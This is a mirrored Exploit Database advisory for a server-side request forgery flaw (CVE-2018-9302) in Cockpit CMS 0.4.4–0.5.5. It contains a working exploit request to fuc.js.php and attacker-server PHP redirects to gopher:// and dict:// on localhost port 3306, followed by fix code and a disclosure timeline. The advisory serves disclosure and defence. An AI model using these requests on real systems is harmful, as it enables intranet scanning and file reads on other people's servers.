Cockpit CMS 0.4.4 < 0.5.5 - Server-Side Request Forgery

• Exploit Database
• 124 阅读

• 作者： Qian Wu, Bo Wang, Jiawang Zhang
  日期： 2018-05-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44567/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93

  # SSRF（Server Side Request Forgery） in Cockpit 0.4.4-0.5.5 (CVE-2018-9302)   Cockpit CMS repairs CVE-2017-14611, but it can be bypassed, SSRF still exist, affecting the Cockpit CMS 0.4.4-0.5.5 versions.I&apos;ve been tested success of "Cockpit CMS" lastest version.   ## Product Download: Cockpit (https://getcockpit.com)   ## Vulnerability Type：SSRF（Server Side Request Forgery）   ## Attack Type : Remote   ## Vulnerability Description   You can edit a .php file on own server. The .php file&apos;s code example:   <?php Header("Location: dict://127.0.0.1:3306/_0d%");?>   ## Exploit Request:   GET /assets/lib/fuc.js.php?url=http://myserver/redirect.php HTTP/1.1 Host: myserver Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8 referer:http://myserver/index.php     Modify the redirect.php file on the attacker&apos;s server.example: <?php Header("Location: gopher://127.0.0.1:3306/_0d%");?>   If the curl function is available,then use gopher、tftp、http、https、dict、ldap、imap、pop3、smtp、telnet protocols method，if not then only use http、https、ftp protocol scan prot,example: <?php Header("Location: dict://127.0.0.1:3306/");?>   If the curl function is unavailable,this vulnerability trigger need allow_url_fopen option is enable in php.ini，allow_url_fopen option defualt is enable.   ## Versions   Product: Cockpit CMS 0.4.4-0.5.5   ## Impact   SSRF (Server Side Request Forgery) in /assets/lib/fuc.js.php in Cockpit 0.4.4 through 0.5.5 allows remote attackers to read arbitrary files or send TCP traffic to intranet hosts via the url parameter.   ## Fix Code   The fix code example：   $url = $_REQUEST[&apos;url&apos;]; $content = null; if (!filter_var($url, FILTER_VALIDATE_URL)) {   header(&apos;HTTP/1.0 400 Bad Request&apos;); return; }   // allow only http requests if (!preg_match(&apos;#^http(|s)\://#&apos;, $url)) { header(&apos;HTTP/1.0 403 Forbidden&apos;); return; } preg_match(&apos;/https*:\/\/(.+)/&apos;, $url, $matches); $host= count($matches) > 1 ? $matches[1] : &apos;&apos;; $ip = gethostbyname($host); //check private ip if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE)) { return }   and modify the line 48 :   curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 0);   ## Credit   This vulnerability was discovered by Qian Wu & Bo Wang & Jiawang Zhang &National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT/CC)   ## References   CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9302   ### Timeline:   2018-04-03Found Cockpit CMS vulnerability.   2018-04-04Submit vulnerability information to developers.   2018-04-05Submit CVE-ID request   2018-04-28Vendor no response, Public vulnerability information,Please Fix it.